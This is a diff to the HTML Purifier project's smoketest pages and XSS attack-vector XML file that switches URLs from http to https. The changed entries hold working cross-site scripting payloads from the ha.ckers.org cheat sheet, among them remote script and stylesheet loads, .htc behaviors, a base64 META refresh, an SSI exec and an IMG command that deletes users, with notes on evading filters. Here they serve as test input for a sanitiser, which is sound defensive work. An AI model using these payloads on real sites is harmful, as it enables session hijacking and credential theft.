"https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>HTML Purifier Config Form Smoketest</title>


@@ -5,8 +5,8 @@ require_once 'common.php';
echo '<?xml version="1.0" encoding="UTF-8" ?>';
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml">
<head>
<title>HTML Purifier data Scheme Smoketest</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

View File

@@ -10,7 +10,7 @@ if (file_exists('../test-settings.php')) include '../test-settings.php';
if (!$csstidy_location) {
?>
Error: <a href="http://csstidy.sourceforge.net/">CSSTidy</a> library not
Error: <a href="https://csstidy.sourceforge.net/">CSSTidy</a> library not
found, please install and configure <code>test-settings.php</code>
accordingly.
<?php
@@ -29,7 +29,7 @@ $purified_html = $purifier->purify($html);
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Extract Style Blocks - HTML Purifier Smoketest</title>

View File

@@ -5,8 +5,8 @@ require_once 'common.php';
echo '<?xml version="1.0" encoding="UTF-8" ?>';
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml">
<head>
<title>HTML Purifier Preserve YouTube Smoketest</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
@@ -15,30 +15,30 @@ echo '<?xml version="1.0" encoding="UTF-8" ?>';
<h1>HTML Purifier Preserve YouTube Smoketest</h1>
<?php
$string = '<object width="425" height="350"><param name="movie" value="http://www.youtube.com/v/BdU--T8rLns"></param><param name="wmode" value="transparent"></param><embed src="http://www.youtube.com/v/BdU--T8rLns" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"></embed></object>
$string = '<object width="425" height="350"><param name="movie" value="https://www.youtube.com/v/BdU--T8rLns"></param><param name="wmode" value="transparent"></param><embed src="https://www.youtube.com/v/BdU--T8rLns" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"></embed></object>
<object width="416" height="337"><param name="movie" value="http://www.youtube.com/cp/vjVQa1PpcFNbP_fag8PvopkXZyiXyT0J8U47lw7x5Fc="></param><embed src="http://www.youtube.com/cp/vjVQa1PpcFNbP_fag8PvopkXZyiXyT0J8U47lw7x5Fc=" type="application/x-shockwave-flash" width="416" height="337"></embed></object>
<object width="416" height="337"><param name="movie" value="https://www.youtube.com/cp/vjVQa1PpcFNbP_fag8PvopkXZyiXyT0J8U47lw7x5Fc="></param><embed src="https://www.youtube.com/cp/vjVQa1PpcFNbP_fag8PvopkXZyiXyT0J8U47lw7x5Fc=" type="application/x-shockwave-flash" width="416" height="337"></embed></object>
<object width="640" height="385"><param name="movie" value="http://www.youtube.com/v/uNxBeJNyAqA&hl=en_US&fs=1&"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/uNxBeJNyAqA&hl=en_US&fs=1&" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="640" height="385"></embed></object>
<object width="640" height="385"><param name="movie" value="https://www.youtube.com/v/uNxBeJNyAqA&hl=en_US&fs=1&"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="https://www.youtube.com/v/uNxBeJNyAqA&hl=en_US&fs=1&" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="640" height="385"></embed></object>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" height="385" width="480"><param name="width" value="480" /><param name="height" value="385" /><param name="src" value="http://www.youtube.com/p/E37ADDDFCA0FD050&amp;hl=en" /><embed height="385" src="http://www.youtube.com/p/E37ADDDFCA0FD050&amp;hl=en" type="application/x-shockwave-flash" width="480"></embed></object>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" height="385" width="480"><param name="width" value="480" /><param name="height" value="385" /><param name="src" value="https://www.youtube.com/p/E37ADDDFCA0FD050&amp;hl=en" /><embed height="385" src="https://www.youtube.com/p/E37ADDDFCA0FD050&amp;hl=en" type="application/x-shockwave-flash" width="480"></embed></object>
<object
classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
id="ooyalaPlayer_229z0_gbps1mrs" width="630" height="354"
codebase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab"><param
name="movie" value="http://player.ooyala.com/player.swf?embedCode=FpZnZwMTo1wqBF-ed2__OUBb3V4HR6za&version=2"
codebase="https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab"><param
name="movie" value="https://player.ooyala.com/player.swf?embedCode=FpZnZwMTo1wqBF-ed2__OUBb3V4HR6za&version=2"
/><param name="bgcolor" value="#000000" /><param
name="allowScriptAccess" value="always" /><param
name="allowFullScreen" value="true" /><param name="flashvars"
value="embedType=noscriptObjectTag&embedCode=pteGRrMTpcKMyQ052c8NwYZ5M5FdSV3j"
/><embed src="http://player.ooyala.com/player.swf?embedCode=FpZnZwMTo1wqBF-ed2__OUBb3V4HR6za&version=2"
/><embed src="https://player.ooyala.com/player.swf?embedCode=FpZnZwMTo1wqBF-ed2__OUBb3V4HR6za&version=2"
bgcolor="#000000" width="630" height="354"
name="ooyalaPlayer_229z0_gbps1mrs" align="middle" play="true"
loop="false" allowscriptaccess="always" allowfullscreen="true"
type="application/x-shockwave-flash"
flashvars="&embedCode=FpZnZwMTo1wqBF-ed2__OUBb3V4HR6za"
pluginspage="http://www.adobe.com/go/getflashplayer"></embed></object>
pluginspage="https://www.adobe.com/go/getflashplayer"></embed></object>
';
$regular_purifier = new HTMLPurifier();

View File

@@ -21,15 +21,15 @@ $printer_css_definition->prepareGenerator($gen_config);
$printer_config_form = new HTMLPurifier_Printer_ConfigForm(
'config',
'http://htmlpurifier.org/live/configdoc/plain.html#%s'
'https://htmlpurifier.org/live/configdoc/plain.html#%s'
);
echo '<?xml version="1.0" encoding="UTF-8" ?>';
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>HTML Purifier Printer Smoketest</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />


@@ -5,7 +5,7 @@ require_once 'common.php';
echo '<?xml version="1.0" encoding="UTF-8" ?>';
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>HTML Purifier Variable Width Attack Smoketest</title>
@@ -14,7 +14,7 @@ echo '<?xml version="1.0" encoding="UTF-8" ?>';
<body>
<h1>HTML Purifier Variable Width Attack Smoketest</h1>
<p>For more information, see
<a href="http://applesoup.googlepages.com/bypass_filter.txt">Cheng Peng Su's
<a href="https://applesoup.googlepages.com/bypass_filter.txt">Cheng Peng Su's
original advisory.</a> This particular exploit code appears only to work
in Internet Explorer, if it works at all.</p>
<h2>Test</h2>

View File

@@ -18,7 +18,7 @@ function formatCode($string)
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>HTML Purifier XSS Attacks Smoketest</title>
@@ -34,7 +34,7 @@ function formatCode($string)
<body>
<h1>HTML Purifier XSS Attacks Smoketest</h1>
<p>XSS attacks are from
<a href="http://ha.ckers.org/xss.html">http://ha.ckers.org/xss.html</a>.</p>
<a href="https://ha.ckers.org/xss.html">https://ha.ckers.org/xss.html</a>.</p>
<p><strong>Caveats:</strong>
<tt>Google.com</tt> has been programatically disallowed, but as you can
see, there are ways of getting around that, so coverage in this area

View File

@@ -30,7 +30,7 @@
</attack>
<attack>
<name>SCRIPT w/Source File</name>
<code>&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;</code>
<code>&lt;SCRIPT SRC=https://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;</code>
<desc>No filter evasion. This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here).</desc>
<label>Basic XSS Attacks</label>
@@ -174,7 +174,7 @@
</attack>
<attack>
<name>IMG Embedded commands 1</name>
<code>&lt;IMG SRC=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt;</code>
<code>&lt;IMG SRC=&quot;https://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt;</code>
<desc>This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc... This is one of the lesser used but more useful XSS vectors.</desc>
<label>HTML Element Attacks</label>
@@ -183,8 +183,8 @@
</attack>
<attack>
<name>IMG Embedded commands 2</name>
<code>Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser</code>
<desc>IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal &lt;IMG SRC=&quot;http://badguy.com/a.jpg&quot;&gt; could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this).</desc>
<code>Redirect 302 /a.jpg https://victimsite.com/admin.asp&amp;deleteuser</code>
<desc>IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal &lt;IMG SRC=&quot;https://badguy.com/a.jpg&quot;&gt; could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this).</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -220,7 +220,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
</attack>
<attack>
<name>LAYER</name>
<code>&lt;LAYER SRC=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/LAYER&gt;</code>
<code>&lt;LAYER SRC=&quot;https://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/LAYER&gt;</code>
<desc>Layer (Older Netscape only)</desc>
<label>HTML Element Attacks</label>
@@ -239,7 +239,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
<attack>
<name>US-ASCII encoding</name>
<code>%BCscript%BEalert(%A2XSS%A2)%BC/script%BE</code>
<desc>Found by Kurt Huwig http://www.iku-ag.de/ This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the hosts transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding.</desc>
<desc>Found by Kurt Huwig https://www.iku-ag.de/ This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the hosts transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS4&lt;/span&gt;]</browser>
@@ -256,7 +256,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
<attack>
<name>META w/data:URL</name>
<code>&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt;</code>
<desc>This is nice because it also doesn&apos;t have anything visibly that has the word SCRIPT or the JavaScript directive in it, since it utilizes base64 encoding. Please see http://www.ietf.org/rfc/rfc2397.txt for more details</desc>
<desc>This is nice because it also doesn&apos;t have anything visibly that has the word SCRIPT or the JavaScript directive in it, since it utilizes base64 encoding. Please see https://www.ietf.org/rfc/rfc2397.txt for more details</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -264,8 +264,8 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
</attack>
<attack>
<name>META w/additional URL parameter</name>
<code>&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
<desc>Meta with additional URL parameter. If the target website attempts to see if the URL contains an &quot;http://&quot; you can evade it with the following technique (Submitted by Moritz Naumann http://www.moritz-naumann.com)</desc>
<code>&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=https://;URL=javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
<desc>Meta with additional URL parameter. If the target website attempts to see if the URL contains an &quot;https://&quot; you can evade it with the following technique (Submitted by Moritz Naumann https://www.moritz-naumann.com)</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -282,7 +282,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
</attack>
<attack>
<name>OBJECT</name>
<code>&lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt;</code>
<code>&lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;https://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt;</code>
<desc>If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag. The linked file is actually an HTML file that can contain your XSS</desc>
<label>HTML Element Attacks</label>
@@ -299,9 +299,9 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
</attack>
<attack>
<name>Embed Flash</name>
<code>&lt;EMBED SRC=&quot;http://ha.ckers.org/xss.swf&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt;</code>
<code>&lt;EMBED SRC=&quot;https://ha.ckers.org/xss.swf&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt;</code>
<desc>Using an EMBED tag you can embed a Flash movie that contains XSS. If you add the attributes allowScriptAccess=&quot;never&quot; and allownetworking=&quot;internal&quot; it can mitigate this risk (thank you to Jonathan Vanasco for the info). Demo: http://ha.ckers.org/weird/xssflash.html :</desc>
<desc>Using an EMBED tag you can embed a Flash movie that contains XSS. If you add the attributes allowScriptAccess=&quot;never&quot; and allownetworking=&quot;internal&quot; it can mitigate this risk (thank you to Jonathan Vanasco for the info). Demo: https://ha.ckers.org/weird/xssflash.html :</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -327,7 +327,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
<attack>
<name>STYLE w/Comment</name>
<code>&lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(&apos;XSS&apos;))&quot;&gt;</code>
<desc>STYLE attribute using a comment to break up expression (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one)</desc>
<desc>STYLE attribute using a comment to break up expression (Thanks to Roman Ivanov https://www.pixel-apes.com/ for this one)</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -371,7 +371,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
</attack>
<attack>
<name>Remote Stylesheet 1</name>
<code>&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org/xss.css&quot;&gt;</code>
<code>&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;https://ha.ckers.org/xss.css&quot;&gt;</code>
<desc>Remote style sheet (using something as simple as a remote style sheet you can include your XSS as the style question redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won&apos;t work unless there is some content on the page other than the vector itself, so you&apos;ll need to add a single letter to the page to make it work if it&apos;s an otherwise blank page.</desc>
<label>HTML Element Attacks</label>
@@ -380,8 +380,8 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
</attack>
<attack>
<name>Remote Stylesheet 2</name>
<code>&lt;STYLE&gt;@import&apos;http://ha.ckers.org/xss.css&apos;;&lt;/STYLE&gt;</code>
<desc>Remote style sheet part 2 (this works the same as above, but uses a &lt;STYLE&gt; tag instead of a &lt;LINK&gt; tag). A slight variation on this vector was used to hack Google Desktop http://www.hacker.co.il/security/ie/css_import.html. As a side note you can remote the end STYLE tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equal sign or a slash in your cross site scripting attack, which has come up at least once in the real world.</desc>
<code>&lt;STYLE&gt;@import&apos;https://ha.ckers.org/xss.css&apos;;&lt;/STYLE&gt;</code>
<desc>Remote style sheet part 2 (this works the same as above, but uses a &lt;STYLE&gt; tag instead of a &lt;LINK&gt; tag). A slight variation on this vector was used to hack Google Desktop https://www.hacker.co.il/security/ie/css_import.html. As a side note you can remote the end STYLE tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equal sign or a slash in your cross site scripting attack, which has come up at least once in the real world.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -389,8 +389,8 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
</attack>
<attack>
<name>Remote Stylesheet 3</name>
<code>&lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt;</code>
<desc>Remote style sheet part 3. This only works in Opera but is fairly tricky. Setting a link header is not part of the HTTP1.1 spec. However, some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: &lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox.</desc>
<code>&lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;https://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt;</code>
<desc>Remote style sheet part 3. This only works in Opera but is fairly tricky. Setting a link header is not part of the HTTP1.1 spec. However, some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: &lt;https://ha.ckers.org/xss.css&gt;; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -398,7 +398,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
</attack>
<attack>
<name>Remote Stylesheet 4</name>
<code>&lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt;</code>
<code>&lt;STYLE&gt;BODY{-moz-binding:url(&quot;https://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt;</code>
<desc>Remote style sheet part 4. This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefore is vulnerable to this for the vast majority of sites.</desc>
<label>HTML Element Attacks</label>
@@ -426,7 +426,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
<attack>
<name>XML namespace</name>
<code>&lt;HTML xmlns:xss&gt;
&lt;?import namespace=&quot;xss&quot; implementation=&quot;http://ha.ckers.org/xss.htc&quot;&gt;
&lt;?import namespace=&quot;xss&quot; implementation=&quot;https://ha.ckers.org/xss.htc&quot;&gt;
&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;
&lt;/HTML&gt;</code>
@@ -440,7 +440,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
<code>&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert(&apos;XSS&apos;);&quot;&gt;]]&gt;
&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;</code>
<desc>XML data island with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 IE rendering engine mode) - vector found by Sec Consult http://www.sec-consult.html while auditing Yahoo.</desc>
<desc>XML data island with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 IE rendering engine mode) - vector found by Sec Consult https://www.sec-consult.html while auditing Yahoo.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -458,7 +458,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
</attack>
<attack>
<name>XML (locally hosted)</name>
<code>&lt;XML SRC=&quot;http://ha.ckers.org/xsstest.xml&quot; ID=I&gt;&lt;/XML&gt;
<code>&lt;XML SRC=&quot;https://ha.ckers.org/xsstest.xml&quot; ID=I&gt;&lt;/XML&gt;
&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;</code>
<desc>Locally hosted XML with embedded JavaScript that is generated using an XML data island. This is the same as above but instead refers to a locally hosted (must be on the same server) XML file that contains the cross site scripting vector.</desc>
@@ -474,7 +474,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
&lt;?import namespace=&quot;t&quot; implementation=&quot;#default#time2&quot;&gt;
&lt;t:set attributeName=&quot;innerHTML&quot; to=&quot;XSS&lt;SCRIPT DEFER&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;&quot;&gt; &lt;/BODY&gt;&lt;/HTML&gt;</code>
<desc>HTML+TIME in XML. This is how Grey Magic http://www.greymagic.com/security/advisories/gm005-mc/ hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work.</desc>
<desc>HTML+TIME in XML. This is how Grey Magic https://www.greymagic.com/security/advisories/gm005-mc/ hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -501,7 +501,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
</attack>
<attack>
<name>Local .htc file</name>
<code>&lt;XSS STYLE=&quot;behavior: url(http://ha.ckers.org/xss.htc);&quot;&gt;</code>
<code>&lt;XSS STYLE=&quot;behavior: url(https://ha.ckers.org/xss.htc);&quot;&gt;</code>
<desc>This uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute.</desc>
<label>Other Attacks</label>
@@ -510,7 +510,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
</attack>
<attack>
<name>Rename .js to .jpg</name>
<code>&lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt;</code>
<code>&lt;SCRIPT SRC=&quot;https://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>Assuming you can only fit in a few characters and it filters against &quot;.js&quot; you can rename your JavaScript file to an image as an XSS vector.</desc>
<label>Other Attacks</label>
@@ -519,7 +519,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
</attack>
<attack>
<name>SSI</name>
<code>&lt;!--#exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT SRC&apos;&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo &apos;=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;&apos;&quot;--&gt;</code>
<code>&lt;!--#exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT SRC&apos;&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo &apos;=https://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;&apos;&quot;--&gt;</code>
<desc>SSI (Server Side Includes) requires SSI to be installed on the server to use this XSS vector. I probably don&apos;t need to mention this, but if you can run commands on the server there are no doubt much more serious issues.</desc>
<label>Other Attacks</label>
